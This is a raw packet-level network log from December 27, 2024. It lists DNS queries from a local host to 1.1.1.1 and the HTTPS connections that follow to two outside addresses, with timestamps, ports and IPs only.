Dec 27, 2024 07:10:37.616055965 CET	53	57437	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:37.862890005 CET	58212	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.863223076 CET	57879	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.863605976 CET	53161	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.863750935 CET	52021	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.886658907 CET	61356	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.887083054 CET	59369	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:37.999526978 CET	53	58212	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:38.000108957 CET	53	57879	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:38.000216961 CET	53	52021	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:38.000690937 CET	53	53161	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:38.023901939 CET	53	61356	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:38.024750948 CET	53	59369	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:38.731089115 CET	55041	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:38.731287956 CET	53055	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:38.741051912 CET	58931	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:38.741228104 CET	64777	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:38.867819071 CET	53	53055	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:38.868554115 CET	53	55041	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:38.871476889 CET	52064	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:38.871628046 CET	61467	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:39.011487961 CET	63458	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:39.011720896 CET	52607	53	192.168.2.5	1.1.1.1
Dec 27, 2024 07:10:39.076011896 CET	53	61467	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:39.148962975 CET	53	52607	1.1.1.1	192.168.2.5
Dec 27, 2024 07:10:40.472575903 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:40.782124043 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.366630077 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.387881994 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.648825884 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.648986101 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.650023937 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.650237083 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.650285959 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.653368950 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.653825045 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.658308983 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.670005083 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:41.720355988 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.986172915 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.986310005 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.986320019 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.986330986 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:41.990253925 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.027293921 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.027476072 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.080967903 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.152883053 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.158850908 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.282938957 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.413531065 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.444919109 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.485994101 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.499464989 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.499485970 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.499567032 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.499991894 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.512126923 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.512157917 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.512170076 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.512260914 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.512756109 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.514095068 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.517585993 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.606424093 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.837327003 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.837454081 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.837465048 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.837479115 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.837686062 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.837757111 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:42.842631102 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.863773108 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.870949984 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:42.871172905 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:43.163389921 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:43.189023018 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:43.957952976 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:43.958132982 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:43.980350971 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:43.980901003 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:44.411849976 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:44.411871910 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:44.412060976 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:44.413816929 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:44.414623976 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.414926052 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.446094036 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:44.447040081 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:44.448478937 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:44.461337090 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:44.817974091 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.819500923 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:44.922261953 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:44.922394991 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:45.255960941 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.267030001 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.272309065 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.272723913 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:45.308345079 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:45.308940887 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:45.309719086 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:45.310214996 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:45.424418926 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.424510956 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.544481993 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.546833992 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.546863079 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.546875000 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.546937943 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.548455000 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.552406073 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.553760052 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.554487944 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.554611921 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.559988976 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.560009003 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.560023069 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.560080051 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.560520887 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.561078072 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.561677933 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.561841965 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.561855078 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.634171963 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.634772062 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.635112047 CET	443	58890	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.635713100 CET	58890	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:45.641562939 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.642306089 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.642620087 CET	443	58514	172.64.41.3	192.168.2.5
Dec 27, 2024 07:10:45.642777920 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:45.748111963 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.748226881 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.748445988 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.748555899 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.877732038 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.877816916 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.877912045 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.877922058 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.877929926 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.878411055 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.878808022 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.886012077 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.886142015 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.886159897 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.886169910 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.886184931 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.886291027 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.886648893 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.886811018 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.891731024 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.891743898 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.892720938 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.898910046 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.905076981 CET	59227	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.939193010 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.946326017 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.946892023 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.957344055 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.965415955 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.965687037 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.973937035 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.983474970 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:45.983828068 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:45.992180109 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.000725031 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.001167059 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.009424925 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.017100096 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.017411947 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.026607990 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.036767006 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.036974907 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.044054031 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.064930916 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.065042973 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.065107107 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.071542025 CET	443	59227	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.072177887 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.072375059 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.088551998 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.089736938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.089847088 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.090236902 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.100081921 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.104479074 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.104649067 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.119311094 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.121733904 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.121895075 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.137223959 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.138745070 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.138894081 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.147754908 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.156402111 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.156629086 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.164545059 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.173104048 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.173274040 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.182049990 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.191370964 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.191539049 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.199785948 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.208596945 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.208776951 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.224514961 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.225481033 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.226109028 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.234703064 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.243102074 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.248322010 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.251132011 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.268933058 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.269026041 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.269301891 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.277009964 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.278449059 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.286309958 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.295180082 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.295376062 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.303431988 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.312526941 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.312916994 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.321199894 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.329895973 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.330152035 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.338486910 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.347465038 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.347630024 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.355489016 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.363938093 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.364116907 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.373068094 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.384989023 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.385165930 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.398576975 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.398704052 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.398994923 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.408180952 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.421833992 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.423136950 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.425091982 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.433486938 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.433696985 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.445913076 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.453355074 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.453584909 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.467499971 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.467607975 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.469290018 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.475800991 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.484863043 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.485017061 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.499957085 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.501351118 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.502367973 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.508616924 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.516081095 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.517524958 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.524573088 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.533437014 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.533809900 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.540266037 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.544193983 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.544442892 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.555502892 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.555610895 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.555998087 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.559470892 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.562530041 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.563415051 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.565740108 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.569015980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.572707891 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.575999975 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.580353975 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.583683014 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.587184906 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.590356112 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.594213963 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.597794056 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.598701000 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.598815918 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.598920107 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.598978996 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.599028111 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.601125002 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.604993105 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.606323004 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.608580112 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.610543966 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.610697031 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.613909006 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.616961002 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.620105028 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.623856068 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.625473022 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.634592056 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.634637117 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.634653091 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.639215946 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.639414072 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.640583992 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.645700932 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.649457932 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.649570942 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.652550936 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.659398079 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.659495115 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.661299944 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.678225994 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.683552980 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.683582067 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.683598042 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.683748007 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.683763981 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.683779001 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.683796883 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.690098047 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.690215111 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.692243099 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.692400932 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.694791079 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.705542088 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.705586910 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.705602884 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.707611084 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.709336042 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.713033915 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.715239048 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.718832970 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.724710941 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.727250099 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.727274895 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.727288961 CET	443	58828	23.209.72.7	192.168.2.5
Dec 27, 2024 07:10:46.753329992 CET	58828	443	192.168.2.5	23.209.72.7
Dec 27, 2024 07:10:46.792649031 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:46.793107986 CET	58514	443	192.168.2.5	172.64.41.3
Dec 27, 2024 07:10:46.807420969 CET	58828	443	192.168.2.5	23.209.72.7
